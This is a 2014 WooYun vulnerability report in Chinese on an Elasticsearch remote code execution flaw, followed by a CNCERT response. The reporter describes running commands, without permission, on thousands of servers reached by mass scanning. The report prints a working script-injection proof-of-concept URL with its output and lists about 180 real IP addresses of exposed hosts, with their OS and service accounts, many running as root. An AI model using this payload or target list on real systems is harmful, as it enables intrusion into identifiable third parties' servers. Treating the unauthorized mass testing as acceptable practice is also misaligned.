当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066218

漏洞标题:我是如何在2小时内组建"5000+集群服务器僵尸网络"的

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-06-25 19:00

修复时间:2014-08-09 19:02

公开时间:2014-08-09 19:02

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-25: 细节已通知厂商并且等待厂商处理中
2014-06-29: 厂商已经确认,细节仅向厂商公开
2014-07-09: 细节向核心白帽子及相关领域专家公开
2014-07-19: 细节向普通白帽子公开
2014-07-29: 细节向实习白帽子公开
2014-08-09: 细节向公众公开

简要描述:

2小时之内顺利在5000多台服务器上输出hello world. @cncert国家互联网应急中心

详细说明:

由于Elasticsearch命令执行漏洞,导致上万服务器受影响,截图所有ip无重复。2小时之内顺利在5000多台服务器上执行相关命令。

2.png


本次仅是技术测试漏洞影响范围,标题党了。国内测试700台集群服务器,成功了170多台。所有测试当中仅测试了1.4w ip成功率接近50%.

漏洞证明:

执行POC:

http://xx.xx.xx.xx:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}


结果如下:

1.png


{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":140847,"max_score":1.0,"hits":[{"_index":"cai","_type":"loganalysis","_id":"f2bb7c30-ab55-11e3-9940-22000a9a8b23","_score":1.0,"fields":{"exp":"[os:Linux-ec2-user/]"}}]}}


返回了当前操作系统类型和当前用户运行Elasticsearch的用户名。
国内受影响IP:

114.112.172.45:Linux-elasticsearch
60.190.240.74:Linux-admin
218.247.15.110:Linux-root
119.254.106.156:Linux-root
112.124.6.156:Linux-root
112.65.228.5:Linux-yxtuser
112.124.68.214:Linux-root
183.129.178.138:Linux-admin
123.127.114.28:Linux-root
123.127.114.32:Linux-root
114.113.156.235:Linux-root
210.26.182.133:Windows Server 2008 R2-tlm
183.60.244.17:Linux-admin
124.248.40.56:Linux-elasticsearch
115.29.160.208:Linux-elasticsearch
222.180.136.70:Linux-logbase
123.125.105.198:Linux-root
59.175.153.24:Linux-root
210.14.154.135:Linux-yada
118.186.12.154:Linux-root
219.232.240.226:Linux-spider
210.34.4.113:Linux-neversion
59.175.153.28:Linux-root
115.29.221.214:Linux-root
202.204.32.142:Windows Server 2008-Administrator
42.96.147.212:Linux-elasticsearch
210.192.125.137:Linux-elasticsearch
114.80.158.118:Linux-webuser
121.192.191.166:Linux-neversion
166.111.135.27:Linux-elasticsearch
219.223.190.244:Linux-root
42.62.26.149:Linux-elasticsearch
101.251.193.21:Linux-root
218.200.15.238:Linux-root
115.28.42.126:Linux-elasticsearch
113.107.226.170:Linux-root
218.205.65.249:Linux-admin
210.14.137.102:Linux-elasticsearch
111.11.197.146:Linux-root
117.27.143.230:Linux-dev
42.96.194.176:Linux-root
115.29.188.127:Linux-elasticsearch
115.29.145.164:Linux-elasticsearch
210.26.182.134:Windows Server 2008 R2-tlm
112.124.68.10:Linux-root
210.192.125.141:Linux-elasticsearch
101.251.193.22:Linux-root
202.91.235.47:Linux-doit
180.153.154.140:Linux-elasticsearch
115.28.151.48:Linux-tomcat7
218.108.129.141:Linux-www
219.140.191.206:Linux-root
210.14.154.136:Linux-yada
203.195.193.90:Linux-elasticsearch
61.164.118.194:Linux-root
60.190.1.83:Windows Server 2008 R2-WIN-AR35FQEMOPC$
202.194.7.250:Linux-root
221.6.207.222:Linux-mota
219.136.249.94:Linux-elasticsearch
121.199.19.79:Linux-elasticsearch
210.5.152.69:Linux-elasticsearch
61.152.123.139:Linux-root
115.29.32.56:Linux-root
121.52.229.225:Linux-root
122.224.243.172:Windows Server 2008 R2-IWEB12$
222.192.61.8:Windows Server 2008 R2-WIN-KFLPLV06RH2$
180.153.177.169:Windows Server 2008 R2-Administrator
202.114.177.32:Linux-elasticsearch
211.153.33.201:FreeBSD-root
103.29.133.165:Linux-admin
211.155.229.2:Linux-doit
42.159.7.88:Linux-elasticsearch
202.192.149.91:Linux-elasticsearch
123.150.207.181:Linux-elasticsearch
202.197.77.3:Linux-root
114.80.158.119:Linux-webuser
220.231.128.242:Linux-root
114.80.158.117:Linux-webuser
59.175.153.94:Linux-root
124.207.188.72:Linux-elasticsearch
121.52.232.27:Linux-admin
202.99.230.148:Linux-elasticsearch
210.32.158.117:Windows Server 2008-Administrator
121.52.213.92:Linux-tankai
222.192.61.9:Windows Server 2008 R2-WIN-FBH6CANACHV$
175.102.33.122:Linux-root
211.155.86.118:Linux-elasticsearch
61.164.112.9:Linux-root
210.73.221.26:Linux-elasticsearch
124.127.201.53:Windows Server 2008 R2-Administrator
118.193.128.202:Linux-root
59.151.86.9:Windows Server 2008 R2-cobazaaradmin
202.192.149.90:Linux-elasticsearch
123.101.0.77:Linux-es
218.94.42.3:Windows 2003-SYSTEM
125.210.209.154:Linux-ec
58.215.139.124:Linux-root
121.199.41.168:Linux-site
60.194.51.18:Linux-elasticsearch
210.51.190.22:Linux-root
180.153.224.122:Linux-root
119.2.0.195:Linux-wubin
166.111.7.105:Linux-aminer
42.96.168.215:Linux-medium
218.108.28.133:Linux-root
121.199.31.235:Linux-elasticsearch
124.207.188.106:Linux-elasticsearch
112.124.103.71:Linux-elasticsearch
121.199.14.195:Linux-elasticsearch
183.129.160.157:Linux-root
59.61.77.4:Linux-elasticsearch
124.95.161.235:Linux-elasticsearch
183.63.149.105:Linux-elasticsearch
118.122.124.188:Linux-elasticsearch
223.4.146.165:Windows Server 2008 R2-WHZD011249$
210.34.4.74:Linux-badboy
202.197.77.1:Linux-root
124.207.188.104:Linux-elasticsearch
218.17.162.90:Windows 2003-SYSTEM
124.248.40.55:Linux-elasticsearch
59.175.153.37:Linux-root
42.62.30.204:Linux-elasticsearch
121.194.2.202:Linux-elasticsearch
62.141.60.253:Linux-elasticsearch
59.106.177.123:Linux-elasticsearch
85.158.182.229:Linux-elasticsearch
162.243.52.4:Linux-elasticsearch
50.97.245.37:Linux-data
192.3.17.46:Linux-root
46.252.21.82:Linux-elasticsearch
95.128.179.92:Linux-elasticsearch
54.199.202.180:Linux-elasticsearch
54.72.186.95:Linux-elasticsearch
184.69.206.134:Linux-elasticsearch
107.170.149.193:Linux-elasticsearch
138.91.191.171:Windows Server 2012-ECOSEARCH$
77.120.101.131:Linux-elasticsearch
95.85.30.247:Linux-elasticsearch
62.210.239.230:Linux-elasticsearch
23.253.35.234:Linux-elasticsearch
85.25.100.198:Linux-elasticsearch
162.243.6.243:Linux-elasticsearch
115.28.153.62:Linux-ringtone
82.95.165.31:Linux-elasticsearch
54.204.149.163:Linux-elasticsearch
206.221.150.100:Linux-elasticsearch
218.241.236.109:Linux-lda
199.80.52.216:Linux-elasticsearch
62.210.215.14:Linux-elasticsearch
46.36.216.71:Linux-elasticsearch
54.255.38.134:Linux-deploy
54.72.78.222:Linux-elasticsearch
162.242.241.223:Linux-elasticsearch
54.251.248.168:Linux-elasticsearch
217.67.30.84:FreeBSD-elasticsearch
89.31.96.201:Linux-elasticsearch
151.236.216.20:Linux-elasticsearch
95.142.163.212:Linux-elasticsearch
23.253.125.187:Linux-elasticsearch
208.94.234.177:Linux-elasticsearch
162.243.37.251:Linux-elasticsearch
178.33.253.101:Linux-julien
178.211.56.101:Windows Server 2008 R2-WIN-ROLMAN9Q7K6$
107.178.214.245:Linux-elasticsearch
46.252.21.183:Linux-elasticsearch
78.140.183.200:SunOS-root
153.121.43.197:Linux-elasticsearch
54.72.222.1:Linux-elasticsearch
162.13.184.118:Linux-elasticsearch
178.170.104.38:Linux-elasticsearch
54.221.61.224:Linux-elasticsearch
54.196.20.198:Linux-elasticsearch
23.253.170.86:Linux-elasticsearch
94.23.222.203:Linux-root

修复方案:

限制ip访问

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-29 21:34

厂商回复:

CNVD对该漏洞已经进行过一轮对政府部门的巡检,至27日,暂时只发现一例政府部门受影响案例。对于所述漏洞,已经由CNVD技术组单位知道创宇公司(zoomeye)协助完成对全网的检测,持续开展对重点用户的IP排查。对于批量检测,比较符合CNCERT全网应急的工作思路,鼓励。rank 20

最新状态:

暂无